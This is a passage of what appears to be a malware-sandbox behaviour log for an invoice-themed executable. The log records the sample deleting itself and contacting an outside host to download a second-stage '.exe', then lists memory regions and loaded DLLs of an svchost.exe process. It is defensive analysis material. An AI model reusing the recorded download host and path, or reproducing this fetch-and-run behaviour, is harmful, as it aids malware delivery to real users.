(lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.929] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.929] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.929] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.929] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.929] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.929] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.930] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.930] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.930] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.930] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.930] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.930] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0281.931] DeleteFileW (lpFileName="C:\\Users\\jbayuelo\\AppData\\Local\\Temp\\Rar$EX00.060\\Invoice_OCT-02-2013.exe" (normalized: "c:\\users\\jbayuelo\\appdata\\local\\temp\\rar$ex00.060\\invoice_oct-02-2013.exe")) returned 0 [0283.648] InternetConnectW (hInternet=0xcc0004, lpszServerName="emrlogistics.com", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0283.684] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="/fr/to2.exe", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x19ff44*="text/*", dwFlags=0x80803000, dwContext=0x0) returned 0xcc000c [0283.795] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x19ff58, lpdwBufferLength=0x19ff50 | out: lpBuffer=0x19ff58, lpdwBufferLength=0x19ff50) returned 1 [0283.795] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x19ff58*, dwBufferLength=0x4) returned 1 [0283.797] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) returned 0 [0328.108] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0) Thread: id = 72 os_tid = 0x12ec Thread: id = 73 os_tid = 0x1480 Thread: id = 74 os_tid = 0x1484 Thread: id = 75 os_tid = 0x14ac Thread: id = 89 os_tid = 0x14c4 Thread: id = 91 os_tid = 0x10f8 Process: id = "5" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x46a5b000" os_pid = "0x34" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x260" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted -p" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AJRouter" [0xa], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xa], "NT SERVICE\\icssvc" [0xa], "NT SERVICE\\lmhosts" [0xe], "NT SERVICE\\NgcCtnrSvc" [0xa], "NT SERVICE\\SmsRouter" [0xa], "NT SERVICE\\TimeBrokerSvc" [0xa], "NT SERVICE\\TimeBroker" [0xa], "NT SERVICE\\vmictimesync" [0xa], "S-1-5-80-1495648203-2503502111-1597754693-3445174711-1316708627" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "S-1-5-80-3916113136-2435487254-2535488001-4050622930-2364918814" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000bfbf" [0xc000000f], "LOCAL" [0x7], "S-1-5-32-1488445330-856673777-1515413738-1380768593-2977925950-2228326386-886087428-2802422674" [0x7], "S-1-5-32-383293015-3350740429-1839969850-1819881064-1569454686-4198502490-78857879-1413643331" [0x7], "S-1-5-32-2035927579-283314533-3422103930-3587774809-765962649-3034203285-3544878962-607181067" [0x7], "S-1-5-32-3659434007-2290108278-1125199667-3679670526-1293081662-2164323352-1777701501-2595986263" [0x7], "S-1-5-32-11742800-2107441976-3443185924-4134956905-3840447964-3749968454-3843513199-670971053" [0x7], "S-1-5-32-3523901360-1745872541-794127107-675934034-1867954868-1951917511-1111796624-2052600462" [0x7] Region: id = 1163 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1164 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1165 start_va = 0x30000 end_va = 0x4cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1166 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1167 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1168 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1169 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1170 start_va = 0x100000 end_va = 0x108fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1171 start_va = 0x110000 end_va = 0x1d8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1172 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1173 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1174 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1175 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1176 start_va = 0x680000 end_va = 0x688fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 1177 start_va = 0x690000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 1178 start_va = 0x890000 end_va = 0x897fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 1179 start_va = 0x8a0000 end_va = 0xa20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 1180 start_va = 0xa30000 end_va = 0xaf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 1181 start_va = 0xb00000 end_va = 0xb00fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 1182 start_va = 0xb10000 end_va = 0xb18fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b10000" filename = "" Region: id = 1183 start_va = 0xb20000 end_va = 0xb9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 1184 start_va = 0xba0000 end_va = 0xbbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 1185 start_va = 0xbc0000 end_va = 0xbdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bc0000" filename = "" Region: id = 1186 start_va = 0xbe0000 end_va = 0xbfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 1187 start_va = 0xc00000 end_va = 0xdfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 1188 start_va = 0xe00000 end_va = 0xe7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 1189 start_va = 0xf80000 end_va = 0xf80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f80000" filename = "" Region: id = 1190 start_va = 0xf90000 end_va = 0xf90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f90000" filename = "" Region: id = 1191 start_va = 0x1000000 end_va = 0x107ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 1192 start_va = 0x1080000 end_va = 0x10e4fff monitored = 0 entry_point = 0x1093640 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1193 start_va = 0x1180000 end_va = 0x14b7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1194 start_va = 0x14c0000 end_va = 0x15bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 1195 start_va = 0x15c0000 end_va = 0x16bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000015c0000" filename = "" Region: id = 1196 start_va = 0x16c0000 end_va = 0x17bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000016c0000" filename = "" Region: id = 1197 start_va = 0x17c0000 end_va = 0x183ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000017c0000" filename = "" Region: id = 1198 start_va = 0x1840000 end_va = 0x18bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001840000" filename = "" Region: id = 1199 start_va = 0x18c0000 end_va = 0x193ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000018c0000" filename = "" Region: id = 1200 start_va = 0x1940000 end_va = 0x19bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001940000" filename = "" Region: id = 1201 start_va = 0x19c0000 end_va = 0x19c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019c0000" filename = "" Region: id = 1202 start_va = 0x19d0000 end_va = 0x19d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019d0000" filename = "" Region: id = 1203 start_va = 0x19e0000 end_va = 0x19e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000019e0000" filename = "" Region: id = 1204 start_va = 0x19f0000 end_va = 0x19f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000019f0000" filename = "" Region: id = 1205 start_va = 0x1a00000 end_va = 0x1bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 1206 start_va = 0x1c00000 end_va = 0x1dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 1207 start_va = 0x1e00000 end_va = 0x1efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 1208 start_va = 0x2000000 end_va = 0x2ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 1209 start_va = 0x3000000 end_va = 0x31fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 1210 start_va = 0x3280000 end_va = 0x3280fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003280000" filename = "" Region: id = 1211 start_va = 0x3290000 end_va = 0x338ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003290000" filename = "" Region: id = 1212 start_va = 0x3400000 end_va = 0x35fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003400000" filename = "" Region: id = 1213 start_va = 0x3600000 end_va = 0x37fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 1214 start_va = 0x3a00000 end_va = 0x3bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a00000" filename = "" Region: id = 1215 start_va = 0x7ffe0000 end_va = 0x7ffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1216 start_va = 0x7ff4fde90000 end_va = 0x7ff4fdf8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff4fde90000" filename = "" Region: id = 1217 start_va = 0x7ff4fdf90000 end_va = 0x7ff5fdfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fdf90000" filename = "" Region: id = 1218 start_va = 0x7ff5fdfb0000 end_va = 0x7ff5fffb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff5fdfb0000" filename = "" Region: id = 1219 start_va = 0x7ff5fffc0000 end_va = 0x7ff5fffc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffc0000" filename = "" Region: id = 1220 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 1221 start_va = 0x7ff635380000 end_va = 0x7ff635390fff monitored = 0 entry_point = 0x7ff635384e80 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 1222 start_va = 0x7ffc15910000 end_va = 0x7ffc15927fff monitored = 0 entry_point = 0x7ffc15911bf0 region_type = mapped_file name = "execmodelproxy.dll" filename = "\\Windows\\System32\\execmodelproxy.dll" (normalized: "c:\\windows\\system32\\execmodelproxy.dll") Region: id = 1223 start_va = 0x7ffc176c0000 end_va = 0x7ffc1773cfff monitored = 0 entry_point = 0x7ffc176c3a80 region_type = mapped_file name = "onecorecommonproxystub.dll" filename = "\\Windows\\System32\\OneCoreCommonProxyStub.dll" (normalized: "c:\\windows\\system32\\onecorecommonproxystub.dll") Region: id = 1224 start_va = 0x7ffc1b2a0000 end_va = 0x7ffc1b2a9fff monitored = 0 entry_point = 0x7ffc1b2a14a0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1225 start_va = 0x7ffc1c030000 end_va = 0x7ffc1c131fff monitored = 0 entry_point = 0x7ffc1c0757d0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1226 start_va = 0x7ffc1d590000 end_va = 0x7ffc1d5acfff monitored = 0 entry_point = 0x7ffc1d5929b0 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1227 start_va = 0x7ffc1d5b0000 end_va = 0x7ffc1d5c6fff monitored = 0 entry_point = 0x7ffc1d5b24b0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1228 start_va = 0x7ffc1f9c0000 end_va = 0x7ffc1f9cafff monitored = 0 entry_point = 0x7ffc1f9c1f70 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1229 start_va = 0x7ffc1f9d0000 end_va = 0x7ffc1fa62fff monitored = 0 entry_point = 0x7ffc1f9d9e10 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 1230 start_va = 0x7ffc1fa70000 end_va = 0x7ffc1fac0fff monitored = 0 entry_point = 0x7ffc1fa7f5e0 region_type = mapped_file name = "dhcpcore6.dll" filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll") Region: id = 1231 start_va = 0x7ffc1fad0000 end_va = 0x7ffc1fb36fff monitored = 0 entry_point = 0x7ffc1fae7760 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 1232 start_va = 0x7ffc205d0000 end_va = 0x7ffc2079ffff monitored = 0 entry_point = 0x7ffc2062cc30 region_type = mapped_file name = "wevtsvc.dll" filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll") Region: id = 1233 start_va = 0x7ffc20a20000 end_va = 0x7ffc20a4ffff monitored = 0 entry_point = 0x7ffc20a2acd0 region_type = mapped_file name = "timebrokerserver.dll" filename = "\\Windows\\System32\\TimeBrokerServer.dll" (normalized: "c:\\windows\\system32\\timebrokerserver.dll") Region: id = 1234 start_va = 0x7ffc20ba0000 end_va = 0x7ffc20babfff monitored = 0 entry_point = 0x7ffc20ba2f90 region_type = mapped_file name = "bi.dll" filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll") Region: id = 1235 start_va = 0x7ffc20c00000 end_va = 0x7ffc20c15fff monitored = 0 entry_point = 0x7ffc20c04250 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 1236 start_va = 0x7ffc21b00000 end_va = 0x7ffc21d01fff monitored = 0 entry_point = 0x7ffc21b6d800 region_type = mapped_file name = "twinapi.appcore.dll" filename = "\\Windows\\System32\\twinapi.appcore.dll" (normalized: "c:\\windows\\system32\\twinapi.appcore.dll") Region: id = 1237 start_va = 0x7ffc22070000 end_va = 0x7ffc2207bfff monitored = 0 entry_point = 0x7ffc22071bc0 region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 1238 start_va = 0x7ffc22230000 end_va = 0x7ffc2226ffff monitored = 0 entry_point = 0x7ffc22241980 region_type = mapped_file name = "brokerlib.dll" filename = "\\Windows\\System32\\BrokerLib.dll" (normalized: "c:\\windows\\system32\\brokerlib.dll") Region: id = 1239 start_va = 0x7ffc24350000 end_va = 0x7ffc24379fff monitored = 0 entry_point = 0x7ffc24359e30 region_type = mapped_file name = "rmclient.dll" filename = "\\Windows\\System32\\rmclient.dll" (normalized: "c:\\windows\\system32\\rmclient.dll") Region: id = 1240 start_va = 0x7ffc24450000 end_va = 0x7ffc24462fff monitored = 0 entry_point = 0x7ffc24453f60 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1241 start_va = 0x7ffc24f00000 end_va = 0x7ffc24f22fff monitored = 0 entry_point = 0x7ffc24f03700 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1242 start_va = 0x7ffc25370000 end_va = 0x7ffc2539efff monitored = 0 entry_point = 0x7ffc253772e0 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 1243 start_va = 0x7ffc253a0000 end_va = 0x7ffc25432fff monitored = 0 entry_point = 0x7ffc253a8f80 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1244 start_va = 0x7ffc25710000 end_va = 0x7ffc25799fff monitored = 0 entry_point = 0x7ffc25755870 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 1245 start_va = 0x7ffc259d0000 end_va = 0x7ffc25a0afff monitored = 0 entry_point = 0x7ffc259da620 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1246 start_va = 0x7ffc25a20000 end_va = 0x7ffc25ae9fff monitored = 0 entry_point = 0x7ffc25a4bc80 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1247 start_va = 0x7ffc25ce0000 end_va = 0x7ffc25d49fff monitored = 0 entry_point = 0x7ffc25cf0e90 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1248 start_va = 0x7ffc25ed0000 end_va = 0x7ffc25edbfff monitored = 0 entry_point = 0x7ffc25ed2200 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1249 start_va = 0x7ffc25fc0000 end_va = 0x7ffc25feafff monitored = 0 entry_point = 0x7ffc25fc2db0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 1250 start_va = 0x7ffc26350000 end_va = 0x7ffc26361fff monitored = 0 entry_point = 0x7ffc26353e30 region_type = mapped_file name = "umpdc.dll" filename = "\\Windows\\System32\\umpdc.dll" (normalized: "c:\\windows\\system32\\umpdc.dll") Region: id = 1251 start_va = 0x7ffc26370000 end_va = 0x7ffc263bafff monitored = 0 entry_point = 0x7ffc26373480 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1252 start_va = 0x7ffc26470000 end_va = 0x7ffc2649dfff monitored = 0 entry_point = 0x7ffc26474f10 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1253 start_va = 0x7ffc264a0000 end_va = 0x7ffc264d0fff monitored = 0 entry_point = 0x7ffc264ae380 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1254 start_va = 0x7ffc265b0000 end_va = 0x7ffc2662efff monitored = 0 entry_point = 0x7ffc265e73e0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1255 start_va = 0x7ffc26630000 end_va = 0x7ffc26739fff monitored = 0 entry_point = 0x7ffc26661300 region_type = mapped_file name = "gdi32full.dll" filename = "\\Windows\\System32\\gdi32full.dll" (normalized: "c:\\windows\\system32\\gdi32full.dll") Region: id = 1256 start_va = 0x7ffc26740000 end_va = 0x7ffc26766fff monitored = 0 entry_point = 0x7ffc26748690 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1257 start_va = 0x7ffc269e0000 end_va = 0x7ffc26adffff monitored = 0 entry_point = 0x7ffc269f5ac0 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 1258 start_va = 0x7ffc26ae0000 end_va = 0x7ffc26b7cfff monitored = 0 entry_point = 0x7ffc26af5390 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 1259 start_va = 0x7ffc26b80000 end_va = 0x7ffc26e46fff monitored = 0 entry_point = 0x7ffc26b91bd0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1260 start_va = 0x7ffc26ea0000 end_va = 0x7ffc26ec1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "win32u.dll" filename = "\\Windows\\System32\\win32u.dll" (normalized: "c:\\windows\\system32\\win32u.dll") Region: id = 1261 start_va = 0x7ffc26ed0000 end_va = 0x7ffc26ed8fff monitored = 0 entry_point = 0x7ffc26ed2020 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1262 start_va = 0x7ffc26ee0000 end_va = 0x7ffc26f89fff monitored = 0 entry_point = 0x7ffc26ef5470 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1263 start_va = 0x7ffc26f90000 end_va = 0x7ffc2702dfff monitored = 0 entry_point = 0x7ffc26f97850 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1264 start_va = 0x7ffc27110000 end_va = 0x7ffc27463fff monitored = 0 entry_point = 0x7ffc27201d00 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1265 start_va = 0x7ffc27470000 end_va = 0x7ffc2760ffff monitored = 0 entry_point = 0x7ffc27487a10 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1266 start_va = 0x7ffc27820000 end_va = 0x7ffc27948fff monitored = 0 entry_point = 0x7ffc27846140 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1267 start_va = 0x7ffc27950000 end_va = 0x7ffc27a72fff monitored = 0 entry_point = 0x7ffc279ada30 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1268 start_va = 0x7ffc27ef0000 end_va = 0x7ffc27f5afff monitored = 0 